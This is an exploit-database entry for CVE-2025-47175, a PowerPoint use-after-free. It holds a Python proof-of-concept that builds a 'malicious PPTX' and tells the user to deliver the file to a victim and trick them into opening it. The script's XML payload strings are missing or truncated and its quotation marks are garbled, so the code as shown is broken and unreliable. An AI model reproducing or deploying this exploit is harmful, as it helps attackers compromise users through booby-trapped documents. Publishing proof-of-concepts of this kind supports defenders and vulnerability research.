Exploit Details
Basic Information
| Exploit Title | Microsoft PowerPoint 2019 – Remote Code Execution (RCE) |
|---|---|
| Exploit ID | EDB-ID:52351 |
| Type | exploitdb |
| Published | 2025-07-08T00:00:00 |
| Modified | 2025-07-08T00:00:00 |
CVSS Information
| CVSS Score | 7.8 |
|---|---|
| Severity | HIGH |
| Vector | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
CVE Information
- CVE-2025-47175
Exploit Description
Exploit Code
# Exploit Title: Microsoft PowerPoint 2019 – Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-07-02
# Tested on: Microsoft PowerPoint 2019 / Office 365 (version before June 2025 Patch)
# CVE: CVE-2025-47175
# Type: Use-After-Free (UAF) Remote Code Execution (local user required)
# Platform: Windows (PowerPoint)
# Author Country: Jordan
# Attack Vector: Local (User must open crafted PPTX file)
# Description:
# This exploit leverages a Use-After-Free vulnerability in Microsoft PowerPoint
# allowing an attacker to execute arbitrary code by tricking a user into opening
# a specially crafted PPTX file. This PoC generates such a malicious PPTX file
# designed to trigger the UAF condition.
#
# Steps of exploitation:
# 1. Run this script to generate the malicious PPTX file.
# 2. Send or trick the target user to open this file in a vulnerable PowerPoint version.
# 3. Exploit triggers upon opening the file, leading to possible code execution.
#
# Note: This PoC creates a simplified PPTX file structure with crafted XML designed
# to trigger the vulnerability. For a full exploit, further memory manipulation and shellcode injection
# are required (not included here).
#
# Affected Versions:
# Microsoft PowerPoint versions prior to June 2025 patch (KB5002689)
#
# Usage:
# python3 exploit_cve2025_47175.py [options]
#
# Options:
# -o, –output Output PPTX filename (default: exploit_cve_2025_47175.pptx)
# -i, –id Shape ID (default: 1234)
# -n, –name Shape Name (default: MaliciousShape)
# -t, –text Trigger text inside the slide (default: explanation message)
#
# Example:
# python3 exploit_cve2025_47175.py -o evil.pptx -i 5678 -n “BadShape” -t “Triggering CVE-2025-47175 now!”
import zipfile
import sys
import argparse
def create_exploit_pptx(filename, shape_id, shape_name, trigger_text):
slide_xml = f”’
try:
with zipfile.ZipFile(filename, ‘w’) as z:
z.writestr(‘[Content_Types].xml’,
”’
z.writestr(‘ppt/_rels/presentation.xml.rels’,
”’
z.writestr(‘ppt/presentation.xml’,
”’
z.writestr(‘ppt/slides/slide1.xml’, slide_xml)
print(f”[+] Malicious PPTX file ‘{filename}’ created successfully.”)
print(“[*] Deliver this file to the victim and wait for them to open it in vulnerable PowerPoint.”)
except Exception as e:
print(f”[-] Error: {e}”, file=sys.stderr)
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description=’Exploit generator for CVE-2025-47175 (PowerPoint UAF)’)
parser.add_argument(‘-o’, ‘–output’, type=str, default=’exploit_cve_2025_47175.pptx’,
help=’Output PPTX filename (default: exploit_cve_2025_47175.pptx)’)
parser.add_argument(‘-i’, ‘–id’, type=int, default=1234,
help=’Shape ID (default: 1234)’)
parser.add_argument(‘-n’, ‘–name’, type=str, default=’MaliciousShape’,
help=’Shape Name (default: MaliciousShape)’)
parser.add_argument(‘-t’, ‘–text’, type=str, default=’This content triggers CVE-2025-47175 UAF vulnerability.’,
help=’Trigger text inside the slide (default: explanation message)’)
args = parser.parse_args()
create_exploit_pptx(args.output, args.id, args.name, args.text)
if __name__ == “__main__”:
main()